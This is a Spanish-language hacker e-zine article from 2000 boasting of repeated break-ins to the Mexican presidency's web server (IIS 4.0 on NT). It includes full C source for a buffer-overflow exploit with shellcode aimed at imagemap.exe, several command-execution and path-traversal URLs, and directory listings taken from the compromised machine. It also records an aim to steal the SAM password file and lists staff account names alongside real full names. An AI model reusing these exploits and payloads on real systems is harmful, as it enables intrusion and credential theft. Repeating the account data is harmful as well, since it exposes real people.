Hackeando Www.presidencia.gob.Mx

=========================================================================------------------------------------------------------------------------------09------( Hackeando www.presidencia.gob.mx )------------------------------RM-11]------------------[ alt3kx_H3z ]----------------------------- ------------------[[email protected]]-------------------------

-= HACKEANDO PRESIDENCIA.GOB.MX =- www.presidencia.gob.mx Por alt3kx!

Comentarios [email protected] (c) 2000 alt3kx_h3z

Definitivamente, los grandes servidores como el que vamos a comentar contiene diferentes vulnerabilidades sobre todo en aspectos de configuración bajo el IIS (Internet information server ) y también en aspectos en servicios como el SAMBA y FTP, definitivamente estamos hablando de WITENDO (Windows NT 4.0 server en este caso).

En este articulo trataremos de abarcar algunas vulnerabilidades que contiene o contenía este servidor llamado "www.presidencia.gob.mx", cabe mencionar que no mostrare los detalles a fondo, pues existen demasiados kiddies por ahí queriendo joder servidores y expresando mil y una idioteces, (ejemplo Cyberpunk y Machinfer) solo basta con visitar la página www.atrition.org pagina la cual se dedica a publicar las WEbcracks que existen alrededor del mundo.

Empezare explicando algunas vulnerabilidades que por años se han encontrado vigentes en este servidor, (digo por años pues he entrado varias veces al servidor sin ser detectado), bien inicio un scan localizando vulnerabilidades:

bash# ./a www.presidencia.gob.mx

HTTP version for www.presidencia.gob.mx

HTTP/1.1 200 OKServer: Microsoft-IIS/4.0Content-Location: http://11.0.0.11/index.htmlDate: Thu, 09 Nov 2000 02:42:37 GMTContent-Type: text/htmlAccept-Ranges: bytesLast-Modified: Thu, 09 Nov 2000 00:53:48 GMTETag: "0b6c284e749c01:217d"

Bien en esta parte estamos detectando que el servidor cuenta con el servicio de IIS versión 4.0 que por ende, deducimos que tiene abierto el puerto 80 el cual podemos ejecutar comandos si el servidor lo deja, en

modo perl, en este modo algunos servidores pueden ejecutar comandos y la mayoría de los bugs se encuentra en las funciones de open () y system() sobre todo en servidores NT en el campo sobre la funciones en scripts de CGI (Comun Gateway Interface).

En C, las funciones open( ) y system( ) sirven para abrir un shell que procese los comandos que se le pasen como argumentos.

Por su parte, en Perl, además de las funciones anteriores, se dispone de open ( ) con tubería o entubado "|", exec( ) y eval( ), así como de las comillas hacia atrás "`". pequeño ejemplo:

exec("/usr/bin/ls","ls","/",0); <--podremos paginar la raiz si tenemos suerte en equipos Linux o Unix.

>Para mayor referencia leer "HACk PCWeek"<

Bien el scan a localizado diferentes vulnerabilidades bastante interesantes, las cuales nos podrán dar acceso al este servidor :-) ...

(1)/_vti_bin/shtml.dll :(2)/_vti_bin/shtml.exe :

Estos dos servicios son proporcionados por FRONT PAGE en la mayoría de las versiones, el error (1) con suerte podremos llamar y paginar la raíz no en todos los casos funciona, para el error (2) existe un DoS (Denial Of Service) yo mismo he realizado el programa basado en perl para explotar esta vulnerabilidad, básicamente existe un llamado en el puerto 80 con la cadena /_vti_bin/shtml.exe ejecutándose remotamente en varias ocasiones causando así que el servidor no responda a la las peticiones y se colapse en tan solo unos minutos. Una vez ejecutado este script al recargar "Refresh" la pagina en tu browser, no desplegara nada, "Ellos verán las pantalla Azul jeje "Screen Death".

El script que hemos comentado se encuentran en la siguientes webs con el siguiente nombre: fpage-DoS.pl

http://www.raza-mexicana.org http://www.hertmx.org

(3)/cgi-bin/imagemap.exe

Otro error en servicios de FRONT PAGE , este ejecutable hace referencia a las imagenes ke puedan estar hospedadas en la web, básicamente el imagemap.exe se incluye en scripts bajo Java, Perl y algunos casos en php. En este error básicamente es un llamado para ejecutar comandos remotamente, con suerte podremos agregar un "dir" ejecutando la cadena siguiente:

"/winnt/system32/cmd.exe?/c+dir"

Para este caso he logrado conseguir como se estructura el servidor:

http://www.presidencia.gob.mxFile C:\Inetpub\wwwroot\ The filename, directory name, or volume label syntax is incorrect

Ahora sabemos que la web se encuentra en la unidad C:\ en el directorio wwwroot este directorio es el default de los servicios de IIS.

Aquí te proporciono el código fuente basado en c/c++ para ejecutar algunos comandos remotos donde hallas localizado el "imagemap.exe":

------------------------------------cortar-------------------------#include <stdio.h>#include <string.h>#include <windows.h>#include <winsock.h>

#define MAXBUF 2000#define RETADR 348#define JMPADR 344#define HTTP_PORT 80

unsigned int mems[]={0xBFB50000, 0xBFB72FFF, 0xBFDE0000, 0xBFDE5FFF,0xBFE00000, 0xBFE0FFFF, 0xBFE30000, 0xBFE42FFF,0xBFE80000, 0xBFE85FFF, 0xBFE90000, 0xBFE95FFF,0xBFEA0000, 0xBFF1EFFF, 0xBFF20000, 0xBFF46FFF,0xBFF50000, 0xBFF60FFF, 0xBFF70000, 0xBFFC5FFF,0xBFFC9000, 0xBFFE2FFF,0,0};

unsigned char exploit_code[200]={0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,0xFF,0x00};

unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";

unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2){ unsigned char *p; unsigned int adr;

for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2){ adr=(unsigned int)p;

if ((adr&0xff)==0) continue; if (((adr>>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0);}

main(int argc,char *argv[]){ SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int i,ip,p1,p2; static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs;

if (argc<2){ printf("usage: %s VictimHost\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)HTTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; for (i=0;;i+=2){ if (mems[i]==0) return FALSE; if ((ip=search_mem((unsigned char *)mems[i], (unsigned char *)mems[i+1],0xff,0xe3))!=0) break; } buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x06;

strcat(exploit_code,cmdbuf); p1=(unsigned int)LoadLibrary;

p2=(unsigned int)GetProcAddress; exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff;

memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf); send(sock,packetbuf,strlen(packetbuf),0); closesocket(sock); printf("Done.\n"); return FALSE;}

------------------------------------cortar-------------------------

Los componentes afectados son HTIMAGE.EXE e IMAGEMAP.EXE, que se ocupan de soportar el "image mapping" o "mapeado de imágenes" desde servidores compatibles con CERN y NCSA, respectivamente. A nivel práctico, "imagemapping" integra los hiperenlaces dentro de las imágenes y permite crear enlaces en determinadas aéreas de un grafico. Un ejemplo típico podría ser el de un mapa grafico en el que, al seleccionar uno de los estados delimitados, nos traslada a otra página con información sobre la región escogida.

La vulnerabilidad a la que hoy nos referimos consiste en el conocido ataque por desbordamiento de buffer. En concreto, un excesivo tamaño en los argumentos que se les pasa como parámetros a estos componentes, puede provocar el acceso no controlado a la memoria del sistema. Una vez que se produce el desbordamiento de buffer, los datos sobrantes que acceden de forma descontrolada a la memoria pueden bloquear el sistema si no pueden interpretarse como comandos o ejecutarse las instrucciones que representan.

Una solución que propone Microsoft (muy pequeña) es la eliminación de estos archivos, mediante una búsqueda sencilla como dar "Buscar"-- "Archivos y carpetas" con los nombres de imagemap.exe y htimage.exe.

La perdida de estos archivos afecta solo a la funcionalidad cuando se utilicen hiperenlaces gráficos tipo CERN O NCSA y el cliente mantenga un navegador muy antiguo, lo que es muy poco probable.

(4)/Default.asp

Error en scripts de ASP (Active Server Page), los ASP básicamente se usan en formularios y servicios para base de datos, en los personal los he manejado poco, pues ya no he programado sobre ASP, pero podemos entender que se hospedan en los servicios del IIS por default, con ASP podremos

lograr demasiadas cosas, lo importante de los ASP es lograr ver el código fuente para así insertar cadenas.

Hablando un poco sobre el error (4), existe la manera de tener acceso a los archivos del sistema remotamente, el trabajo consiste en localizar los directorios posibles para ejecución, el problema es causado por el IIS, que no verifica la autentificación sobre los comandos transcritos sobre el servicio, el error es básicamente agregar comandos para obtener respuesta del servidor ejemplo:

http://www.presidencia.gob.mx/default.asp%20.pl

IIS recibe esta respuesta y asume que es para un perl script, perl cuando recibe la instrucción para ejecutar default.asp, deja pasarla como una instrucción con extension.pl, con esto podremos engañar al servidor para ejecutar algunos otros comandos ejemplo:

http://www.presidencia.gob.mx/passwd.txt%20.pl

Si tenemos suerte podremos obtener un error como este:

C:\Inetpub\scripts\passwd.txt line 1

Algunos ejemplos en ASP:

[Codebrws.asp]: Originalmente localizado en la siguiente ruta:/iissamples/exair/howitworks/codebrws.asp?Exploit:SERVER/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../../../../ARCHIVO

[Showcode.asp]: Originalmente localizado en la siguiente ruta:/msadc/samples/selector/showcode.aspExploit:SERVER/msadc/samples/selector/showcode.asp?source=/msadc/Samples/../../../../../ARCHIVO

Codigo fuente del ASP (showcode.asp)--------------------------------------------------------------------------------<SCRIPT LANGUAGE=VBScript RUNAT=Server>

REM *************** NOTICE **************** REM * This file may only be used to view * REM * source code of .asp files in the * REM * AdvWorks or ASP Sample directory. * REM * If you wish to change the security * REM * on this, modify or remove this * REM * function. * REM ***************************************

FUNCTION fValidPath (ByVal strPath)

If InStr(1, strPath, "/Msadc/", 1) Then fValidPath = 1 Else fValidPath = 0 End If END FUNCTION</SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server> REM Returns the minimum number greater than 0 REM If both are 0, returns -1 FUNCTION fMin (iNum1, iNum2) If iNum1 = 0 AND iNum2 = 0 Then fMin = -1 ElseIf iNum2 = 0 Then fMin = iNum1 ElseIf iNum1 = 0 Then fMin = iNum2 ElseIf iNum1 < iNum2 Then fMin = iNum1 Else fMin = iNum2 End If END FUNCTION</SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server> FUNCTION fCheckLine (ByVal strLine)

fCheckLine = 0 iTemp = 0

iPos = InStr(strLine, "<" & "%") If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 1 End If

iPos = InStr(strLine, "%" & ">") If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 2 End If

iPos = InStr(1, strLine, "<" & "SCRIPT", 1) If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 3 End If

iPos = InStr(1, strLine, "<" & "/SCRIPT", 1) If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 4 End If

END FUNCTION

</SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server>SUB PrintHTML (ByVal strLine) iSpaces = Len(strLine) - Len(LTrim(strLine)) i = 1 While Mid(Strline, i, 1) = Chr(9) iSpaces = iSpaces + 5 i = i + 1 Wend If iSpaces > 0 Then For i = 1 to iSpaces Response.Write(" ") Next End If iPos = InStr(strLine, "<") If iPos Then Response.Write(Left(strLine, iPos - 1)) Response.Write("<") strLine = Right(strLine, Len(strLine) - iPos) Call PrintHTML(strLine) Else Response.Write(strLine) End If END SUB</SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server> SUB PrintLine (ByVal strLine, iFlag) Select Case iFlag Case 0 Call PrintHTML(strLine) Case 1 iPos = InStr(strLine, "<" & "%") Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("<FONT COLOR=#ff0000>") Response.Write("<%") strLine = Right(strLine, Len(strLine) - (iPos + 1)) Call PrintLine(strLine, fCheckLine(strLine)) Case 2 iPos = InStr(strLine, "%" & ">") Call PrintHTML(Left(strLine, iPos -1)) Response.Write("%>") Response.Write("</FONT>") strLine = Right(strLine, Len(strLine) - (iPos + 1)) Call PrintLine(strLine, fCheckLine(strLine)) Case 3 iPos = InStr(1, strLine, "<" & "SCRIPT", 1) Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("<FONT COLOR=#0000ff>") Response.Write("<SCRIPT") strLine = Right(strLine, Len(strLine) - (iPos + 6)) Call PrintLine(strLine, fCheckLine(strLine)) Case 4 iPos = InStr(1, strLine, "<" & "/SCRIPT>", 1) Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("</SCRIPT>")

Response.Write("</FONT>") strLine = Right(strLine, Len(strLine) - (iPos + 8)) Call PrintLine(strLine, fCheckLine(strLine)) Case Else Response.Write("FUNCTION ERROR -- PLEASE CONTACT ADMIN.") End Select END SUB</SCRIPT>

<% strVirtualPath = Request("source") %>

<HTML><HEAD><TITLE>View Active Server Page Source</TITLE></HEAD><BODY BGCOLOR=#FFFFFF><FONT FACE="Verdana, Arial, Helvetica" SIZE=6><TABLE><TR><TD><IMG SRC="/Msadc/Samples/Selector/asp.gif"WIDTH=200 HEIGHT=93 BORDER=0 ALT="Active Server Page logo"></TD><TD><FONT FACE="Verdana, Arial, Helvetica" SIZE=6>View ASP Source</FONT></TD></TR></TABLE><FONT FACE="Verdana, Arial, Helvetica" SIZE=2>Go Back to <a href="<%=strVirtualPath%>"><%=strVirtualPath%></A><BR><hr><%If fValidPath(strVirtualPath) Then strFilename = Server.MapPath(strVirtualPath) Set FileObject = Server.CreateObject("Scripting.FileSystemObject") Set oInStream = FileObject.OpenTextFile (strFilename, 1, FALSE ) While NOT oInStream.AtEndOfStream strOutput = oInStream.ReadLine Call PrintLine(strOutput, fCheckLine(strOutput)) Response.Write("<BR>") Wend Else Response.Write("<H1>View Active Server Page Source-- Access Denied</H1>") End If%>

</BODY></HTML>

>Lectura recomendada ASP PROGRAMING MS<

(5)/msadc/msadcs.dll

Se ha comentado mucho sobre este error en varias ocasiones por lo cual solo hare referencia al artículo que realizo _0x90_ en la e-zine de raza-mexicana en la raza#10, Te pongo la dirección exacta para que puedas leer este buen artículo:

http://www.raza-mexicana.org/revista/html/raza10-2.html#iisrds

He puesto las vulnerabilidades mas conocidas he importantes sobre este servidor, a partir de este momento posteare algunos archivos que se encuentran en los directorios más importantes bajo el servidor NT 4.0 con servicio IIS 4.0 del servidor www.presidencia.gob.mx.

Tecleando C:\dir C:\Inetpub\scripts se localiza lo siguiente:

Directory of C:\Inetpub\scripts10/28/00 07:31p <DIR> .10/28/00 07:31p <DIR> ..04/07/99 08:57p <DIR> buscar 4 File(s) 208,144 bytes 579,322,880 bytes free

Tecleando C:\dir C:\Inetpub se localiza lo siguiente:

Directory of c:\Inetpub

10/05/00 11:48p <DIR> .10/05/00 11:48p <DIR> ..10/27/00 01:12p <DIR> catesp08/31/00 12:53p <DIR> catexp10/27/00 01:13p <DIR> cating04/07/99 10:40p <DIR> catkids12/24/99 12:01p <DIR> iissamples06/03/99 01:31p <DIR> Repaldos10/28/00 07:31p <DIR> scripts10/24/00 09:03a <DIR> wwwroot 10 File(s) 0 bytes 579,322,880 bytes free

Quiero ver que hay desde raiz :-)

Tecleando C:\dir C:\ se localiza lo siguiente:

Directory of c:\10/16/00 08:02p <DIR> Almacen03/31/99 05:00a 0 AUTOEXEC.BAT03/31/99 05:00a 0 CONFIG.SYS09/03/00 03:41p <DIR> especial09/02/00 08:14p 372 FRONTPG.LOG10/05/00 11:48p <DIR> Inetpub04/07/99 09:12p <DIR> List10/24/00 06:36p 67,108,864 pagefile.sys04/05/99 11:42a <DIR> php308/31/00 08:36p <DIR> Program Files07/19/99 12:03p <DIR> ssinst04/05/00 10:17a <DIR> StatisticsServer10/28/00 10:23a <DIR> TEMP10/28/00 07:38p <DIR> WINNT10/28/00 10:25a 469,869 winzip.log 15 File(s) 67,579,105 bytes 579,322,880 bytes free

Tecleando C:\dir C:\WINNT se localiza lo siguiente:

Directory of c:\WINNT10/28/00 07:38p <DIR> .10/28/00 07:38p <DIR> ..02/17/98 10:51a 20,480 aceclcab.exe02/17/98 10:53a 690,534 aceclnt.cab08/31/00 08:30p 6,305 Active Setup Log.BAK08/31/00 08:38p 10,018 Active Setup Log.txt08/31/00 08:30p 0 AdvpackExt.BAK08/31/00 08:36p 0 AdvpackExt.log03/29/99 01:16p 21,590 Bind List Log.txt10/13/96 07:38p 5,328 black16.scr03/29/99 01:15p <DIR> CatRoot05/08/98 12:00a 84,032 Channel Screen Saver.SCR10/13/96 07:38p 82,944 clock.avi12/29/98 11:54p 49,424 clspack.exe12/24/99 12:01p <DIR> cm3203/31/99 04:49a <DIR> Config03/31/99 05:00a 0 control.ini03/29/99 01:14p <DIR> COOKIES08/31/00 08:37p <DIR> Cursors09/11/00 07:24p 1,576,127 drwtsn32.log11/18/99 11:04a 237,328 EXPLORER.EXE05/08/98 12:00a 103,424 EXTRAC32.EXE08/31/00 08:37p 100,864 extract.exe03/29/99 01:28p 276 frontpg.ini04/08/00 10:05a <DIR> Help08/31/00 08:37p 26,896 hh.exe03/29/99 01:14p <DIR> History03/29/99 01:15p 128,985 IE4 Setup Log.Txt11/18/99 11:04a 150,898 IEHELP.EXE08/31/00 08:37p 17,655 iextract.exe12/29/98 11:07p 6,550 jautoexp.dat05/18/98 12:00a 14,017 JAUTOEXP.INI03/29/99 01:20p <DIR> Java07/04/99 10:55a 1,729 javainst.log12/29/98 11:51p 169,232 jview.exe10/13/96 07:38p 157,044 lanma256.bmp10/13/96 07:38p 157,044 lanmannt.bmp07/04/99 11:52a 2,670 MDACSET.log10/19/00 01:27p 185 mdm.ini04/08/00 10:05a <DIR> Media10/27/00 09:47p 165 mmc.INI05/28/99 11:25a <DIR> Mon07/05/99 02:31p <DIR> msapps11/03/97 04:48p 1,405 MSDFMAP.INI03/29/99 01:31p 16,384 MSIMGSIZ.DAT12/19/96 12:00a 49,094 MSO97.ACL10/13/96 07:38p 67,328 network.wri10/13/96 07:38p 45,328 NOTEPAD.EXE10/24/00 06:27p 2,304 ODBC.INI08/31/00 08:52p 5,702 ODBCINST.INI08/15/98 01:53p 2,780 php3.ini11/18/99 11:04a 123,152 POLEDIT.EXE10/13/96 07:38p 34,816 printer.wri

03/29/99 11:04a <DIR> Profiles08/30/99 03:43a <DIR> Proyectos10/13/96 07:38p 71,952 REGEDIT.EXE07/23/98 02:18p 40,960 REGTLIB.EXE04/06/99 12:01p <DIR> repair03/29/99 01:20p 20,034 RunOnceEx Log.txt03/29/99 01:22p <DIR> Samples09/11/99 05:17p 1,004 scsE0.tmp12/29/98 11:53p 46,352 setdebug.exe04/08/00 10:05a 308 setup.old08/31/00 04:33p 286,720 Setup1.exe03/29/99 11:01a 138 setuplog.txt03/29/99 01:16p 956 Soft Boot Log.txt08/31/00 04:33p 73,216 ST6UNST.EXE03/29/99 01:20p <DIR> Subscriptions08/31/00 08:30p <DIR> system10/13/96 07:38p 219 system.ini10/24/00 06:36p <DIR> system3210/13/96 07:38p 32,016 TASKMAN.EXE03/29/99 01:20p <DIR> Temporary Internet Files09/11/00 07:25p 110,539,070 user.dmp07/04/99 11:08a 1,245 VB.INI10/24/00 06:39p 62 VBAddin.INI08/31/00 08:54p <DIR> VBE07/04/99 11:42a 2,659 vminst.log10/13/96 07:38p 24,336 vmmreg32.dll03/29/99 01:16p <DIR> Web10/13/96 07:38p 22,288 welcome.exe10/28/00 10:29a 423 WIN.INI10/13/96 07:38p 3 WINFILE.INI10/13/96 07:38p 256,192 WINHELP.EXE11/18/99 11:04a 311,056 WINHLP32.EXE12/29/98 11:52p 162,576 wjview.exe07/04/99 11:08a 0 wplog.txt10/13/96 07:38p 707 _DEFAULT.PIF07/03/00 11:36a 0 ~DF1026.tmp07/14/99 11:52a 0 ~DF11A2.tmp01/01/00 12:03a 0 ~DF17A.tmp09/02/00 08:00p 0 ~DF1BED.tmp09/03/00 01:36p 0 ~DF30.tmp09/02/00 08:12p 0 ~DF315D.tmp11/14/99 04:56p 0 ~DF3DEB.tmp06/08/00 03:47p 0 ~DF42C4.tmp03/29/99 07:08p 0 ~DF5F3F.tmp09/02/00 08:22p 0 ~DF61F7.tmp04/06/99 09:49a 0 ~DF63C8.tmp09/02/00 08:22p 0 ~DF654A.tmp09/04/00 11:28a 0 ~DF731F.tmp04/06/99 10:19a 0 ~DF7382.tmp04/06/99 11:04a 0 ~DF8C6D.tmp10/24/00 06:17p 0 ~DFA8E.tmp03/29/99 01:30p 0 ~DFB853.tmp10/06/00 11:53a 0 ~DFBA7A.tmp05/11/99 01:35p 0 ~DFBD0F.tmp04/07/99 07:51p 0 ~DFBF40.tmp05/07/99 10:08a 0 ~DFC2ED.tmp11/25/99 03:19p 0 ~DFCC29.tmp

09/04/00 05:30p 0 ~DFD410.tmp02/23/00 11:23p 0 ~DFD6A5.tmp04/05/99 09:25a 0 ~DFD73.tmp12/06/99 07:01p 0 ~DFD849.tmp07/14/99 11:00a 0 ~DFDB4C.tmp10/06/99 06:50p 0 ~DFDC15.tmp05/11/99 01:40p 0 ~DFDDB9.tmp07/20/99 11:33a 0 ~DFDF72.tmp09/17/00 04:00p 0 ~DFE17B.tmp06/08/99 01:32p 0 ~DFE24D.tmp05/12/99 08:51a 0 ~DFE2D9.tmp06/25/00 07:24p 0 ~DFE379.tmp07/04/99 11:46a 0 ~DFE56E.tmp05/26/99 07:08p 0 ~DFE5DC.tmp06/08/99 11:10p 0 ~DFE65E.tmp05/11/99 12:25p 0 ~DFE668.tmp03/08/00 08:20p 0 ~DFE6A4.tmp08/10/00 08:18p 0 ~DFE6FF.tmp05/07/99 09:53p 0 ~DFE709.tmp05/04/99 08:49p 0 ~DFE795.tmp06/17/99 10:34a 0 ~DFE817.tmp05/07/99 09:18a 0 ~DFE821.tmp09/25/00 10:38a 0 ~DFE83F.tmp04/10/99 01:13p 0 ~DFE989.tmp08/31/00 05:14p 0 ~DFEA3E.tmp07/04/99 10:59a 0 ~DFEAB6.tmp07/04/99 11:55a 0 ~DFEAFC.tmp08/25/99 08:23p 0 ~DFEBCE.tmp11/14/99 03:39p 0 ~DFEBF6.tmp03/01/00 09:35p 0 ~DFED23.tmp10/05/99 07:30p 0 ~DFEDF5.tmp07/04/99 11:12a 0 ~DFEE1D.tmp04/08/99 12:01a 0 ~DFEE3B.tmp04/14/99 10:03p 0 ~DFEF22.tmp04/22/99 11:22a 0 ~DFEF5E.tmp08/26/99 08:27p 0 ~DFEF5F.tmp08/31/99 12:49a 0 ~DFEFC2.tmp08/03/99 07:26p 0 ~DFEFE0.tmp04/10/99 01:09p 0 ~DFEFF4.tmp07/21/99 11:19p 0 ~DFF207.tmp12/30/99 11:11p 0 ~DFF473.tmp03/29/99 06:54p 0 ~DFF528.tmp03/04/00 12:43a 0 ~DFF55A.tmp03/03/00 10:46p 0 ~DFF5DC.tmp11/22/99 04:46p 0 ~DFF5FA.tmp03/29/99 07:00p 0 ~DFF781.tmp08/31/00 02:26p 0 ~DFF79F.tmp08/31/00 02:40p 0 ~DFF7F9.tmp10/24/00 06:36p 0 ~DFF867.tmp08/31/00 10:42p 0 ~DFF92F.tmp04/07/99 11:49p 0 ~DFF94D.tmp08/31/00 07:49p 0 ~DFF9C5.tmp09/04/00 11:41a 0 ~DFF9D9.tmp08/30/00 06:20p 0 ~DFF9EE.tmp09/04/00 05:36p 0 ~DFFA5C.tmp08/24/00 12:32a 0 ~DFFA7A.tmp02/18/00 04:21p 0 ~DFFAB6.tmp

08/31/00 04:58p 0 ~DFFB60.tmp04/06/00 07:16p 0 ~DFFB7E.tmp03/02/00 08:39p 0 ~DFFBD8.tmp09/12/00 07:26p 0 ~DFFBD9.tmp12/24/99 01:07p 0 ~DFFBE2.tmp10/21/00 10:02a 0 ~DFFC14.tmp08/31/00 08:45p 0 ~DFFC1E.tmp08/31/00 12:46p 0 ~DFFC3C.tmp09/11/00 07:43p 0 ~DFFC6E.tmp09/18/00 05:36p 0 ~DFFC6F.tmp01/25/00 03:27p 0 ~DFFC82.tmp08/28/00 09:56a 0 ~DFFCBF.tmp03/03/00 10:20p 0 ~DFFCE7.tmp09/04/00 01:41p 0 ~DFFD2D.tmp03/04/00 12:31a 0 ~DFFD55.tmp08/03/99 10:02p 0 ~DFFDAF.tmp01/14/00 10:03a 0 ~DFFDB9.tmp10/07/00 10:58a 0 ~DFFDBA.tmp09/15/00 12:29p 0 ~DFFDC3.tmp04/07/99 09:21p 0 ~DFFDEB.tmp05/05/00 09:57a 0 ~DFFE1D.tmp04/05/99 09:39a 0 ~DFFE81.tmp09/04/00 06:32p 0 ~DFFEBD.tmp10/05/00 09:58a 0 ~DFFF53.tmp07/05/00 10:27p <DIR> ~offfilt09/02/00 08:22p 42,496 ~WRC0000.tmp09/02/00 08:01p 1,536 ~WRF0000.tmp 194 File(s) 116,108,561 bytes 579,322,880 bytes free

Robemos el sam._ :-)

Tecleando C:\dir C:\WINNT\repair se localiza lo siguiente:

c:\winnt\repair01/01/00 04:24a <DIR> .01/01/00 04:24a <DIR> ..10/14/96 03:38a 438 autoexec.nt01/01/00 04:29a 2,510 config.nt01/01/00 04:31a 15,508 default._01/01/00 04:31a 14,768 ntuser.da_01/01/00 04:31a 3,511 sam._01/01/00 04:31a 6,393 security._01/01/00 04:31a 131,946 software._01/01/00 04:31a 85,390 system._ 10 File(s) 260,464 bytes

Tecleando C:\dir C:\Inetpub\scripts\buscar se localiza lo siguiente:

Directory of c:\Inetpub\scripts\buscar

04/07/99 08:57p <DIR> .04/07/99 08:57p <DIR> ..09/17/98 07:28p 2,668 basica.htm05/22/98 09:44p 10,150 basica.htx09/26/98 12:23a 518 basica.idq09/17/98 07:32p 2,668 basica1.htm

07/03/98 12:09p 10,181 Basicaex.htx09/26/98 12:23a 522 Basicaex.idq09/17/98 07:38p 1,504 basicaResp.htm09/17/98 07:38p 1,504 Copia de basicafuera.htm09/17/98 07:28p 2,005 query.htm04/06/99 10:04a <DIR> _vti_cnf 12 File(s) 31,720 bytes 579,322,880 bytes free

Quiero ver que hay en el Program Files :-)

Tecleando C:\dir C:\progra~1 se localiza lo siguiente:

Directory of c:\progra~1

08/31/00 08:36p <DIR> .08/31/00 08:36p <DIR> ..07/04/99 11:05a <DIR> Common Files10/24/00 04:46p <DIR> Explora12/24/99 12:00p <DIR> MarkVis03/29/99 01:28p <DIR> Microsoft FrontPage08/31/00 08:33p <DIR> Microsoft Office03/29/99 01:26p <DIR> Microsoft Script Debugger07/04/99 11:07a <DIR> Microsoft Visual Studio12/24/99 12:02p <DIR> Mts03/11/00 01:28p <DIR> NT OBJECTives, Inc08/31/00 08:33p <DIR> Office200003/29/99 11:01a <DIR> Plus!07/12/99 02:43p <DIR> Respaldos07/04/99 11:07a <DIR> Web Publish03/14/00 11:23a <DIR> WEBTREND04/08/00 10:05a <DIR> Windows NT09/06/99 10:53a <DIR> WinZip 18 File(s) 0 bytes 579,257,344 bytes free

K00l tienen Office2000, Front Page, y Winzip :X

Quiero saber que hay en Microsoft FrontPage

Tecleando C:\dir C:\progra~1\micros~1 se localiza lo siguiente:

Directory of c:\progra~1\micros~1

03/29/99 01:28p <DIR> .03/29/99 01:28p <DIR> ..03/29/99 01:28p 551 FrontPage Server Administrator.lnk03/29/99 01:28p <DIR> temp03/29/99 01:28p <DIR> version3.0 5 File(s) 551 bytes 579,191,808 bytes free

Quiero saber que hay dentro de version3.0

Tecleando C:\dir C:\progra~1\micros~1\version3.0 se localiza lo siguiente:

Directory of c:\progra~1\micros~1\version3.003/29/99 01:28p <DIR> .03/29/99 01:28p <DIR> ..03/29/99 01:26p <DIR> admin03/29/99 01:26p <DIR> bin03/29/99 01:26p <DIR> isapi03/29/99 01:26p <DIR> serk03/28/00 08:58p <DIR> servsupp03/29/99 01:28p <DIR> temp03/29/99 01:28p <DIR> _vti_bin 9 File(s) 0 bytes 579,191,808 bytes free

-------------------------------------------------------------Algunos Mails/Usuarios sobre el dominio presidencia.gob.mx

-------------------------------------------------------------

Account Name :[email protected]

The abc account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon.

Comment :Secretaria PrivadaUser Comment :Full name :anonimo


The abrun account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon.

Comment :Consejeria JuridicaUser Comment :Full name :Ana Brun Iñarritu


The acast account is a normal USER, and the password was changed 0 days ago. This account has been used 4 times to logon.

Comment :Prospectiva y Proyectos EspecialesUser Comment :Full name :Akram Daniel Castillo Cardenas


The acontla account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon.

Comment :CAC - Coord. Admiva.User Comment :Full name :Alejandro Contla Hosking

Account Name :Administrator

